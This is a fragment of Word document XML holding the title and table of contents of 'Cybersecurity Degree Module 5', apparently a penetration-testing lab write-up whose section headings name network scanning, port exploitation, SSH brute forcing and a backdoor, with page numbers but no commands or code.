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1B0F39">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc155025634"/>
      <w:r>
        <w:t>Cybersecurity Degree Module 5</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="384A1D44" w14:textId="77777777" w:rsidR="00012388" w:rsidRPr="00012388" w:rsidRDefault="00012388" w:rsidP="00012388"/>
    <w:p w14:paraId="33258C38" w14:textId="40E0E372" w:rsidR="00D76D9B"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025634" w:history="1">
        <w:r w:rsidR="00D76D9B" w:rsidRPr="00E7325C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Cybersecurity Degree Module 5</w:t>
        </w:r>
        <w:r w:rsidR="00D76D9B">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00D76D9B">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00D76D9B">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155025634 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00D76D9B">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00D76D9B">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00D76D9B">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidR="00D76D9B">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4280FF5C" w14:textId="1970F5DF" w:rsidR="00D76D9B" w:rsidRDefault="00D76D9B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155025635" w:history="1">
        <w:r w:rsidRPr="00E7325C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Resources</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155025635 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="69D13D0B" w14:textId="2C7778D4" w:rsidR="00D76D9B" w:rsidRDefault="00D76D9B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155025636" w:history="1">
        <w:r w:rsidRPr="00E7325C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Web references</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155025636 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B1FB9EC" w14:textId="0571A5F3" w:rsidR="00D76D9B" w:rsidRDefault="00D76D9B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155025637" w:history="1">
        <w:r w:rsidRPr="00E7325C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Running netdiscover</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155025637 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B2C4DEE" w14:textId="2C0E7470" w:rsidR="00D76D9B" w:rsidRDefault="00D76D9B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155025638" w:history="1">
        <w:r w:rsidRPr="00E7325C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 1524</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155025638 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5DB669F8" w14:textId="4D889B69" w:rsidR="00D76D9B" w:rsidRDefault="00D76D9B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155025639" w:history="1">
        <w:r w:rsidRPr="00E7325C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Exploitng Port 21</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155025639 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A0C2603" w14:textId="12E0676B" w:rsidR="00D76D9B" w:rsidRDefault="00D76D9B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155025640" w:history="1">
        <w:r w:rsidRPr="00E7325C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 22 Exploiting Open SSH</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155025640 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F1B0F89" w14:textId="2B30B128" w:rsidR="00D76D9B" w:rsidRDefault="00D76D9B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155025641" w:history="1">
        <w:r w:rsidRPr="00E7325C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 80</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155025641 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C3001CA" w14:textId="18D1465D" w:rsidR="00D76D9B" w:rsidRDefault="00D76D9B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155025642" w:history="1">
        <w:r w:rsidRPr="00E7325C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 445</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155025642 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="68C18882" w14:textId="1E9306F9" w:rsidR="00D76D9B" w:rsidRDefault="00D76D9B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155025643" w:history="1">
        <w:r w:rsidRPr="00E7325C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Revisit SSH</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155025643 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="639ED32B" w14:textId="07159AE9" w:rsidR="00D76D9B" w:rsidRDefault="00D76D9B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155025644" w:history="1">
        <w:r w:rsidRPr="00E7325C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Brute force ssh</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155025644 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F1800B2" w14:textId="01A81CEE" w:rsidR="00D76D9B" w:rsidRDefault="00D76D9B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155025645" w:history="1">
        <w:r w:rsidRPr="00E7325C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 8180</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155025645 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="36DF91F8" w14:textId="1CDD8A3E" w:rsidR="00D76D9B" w:rsidRDefault="00D76D9B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155025646" w:history="1">
        <w:r w:rsidRPr="00E7325C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 5432</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155025646 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="39EFA0C0" w14:textId="7B39AA7A" w:rsidR="00D76D9B" w:rsidRDefault="00D76D9B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155025647" w:history="1">
        <w:r w:rsidRPr="00E7325C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 23</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155025647 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="38F6AE6E" w14:textId="5E14FCCF" w:rsidR="00D76D9B" w:rsidRDefault="00D76D9B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155025648" w:history="1">
        <w:r w:rsidRPr="00E7325C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 1099</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155025648 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A8E9324" w14:textId="68BB6F29" w:rsidR="00D76D9B" w:rsidRDefault="00D76D9B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155025649" w:history="1">
        <w:r w:rsidRPr="00E7325C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 5900</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155025649 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7AAFBC78" w14:textId="74905BB3" w:rsidR="00D76D9B" w:rsidRDefault="00D76D9B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155025650" w:history="1">
        <w:r w:rsidRPr="00E7325C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>BackDoor v3.2.8.1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155025650 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
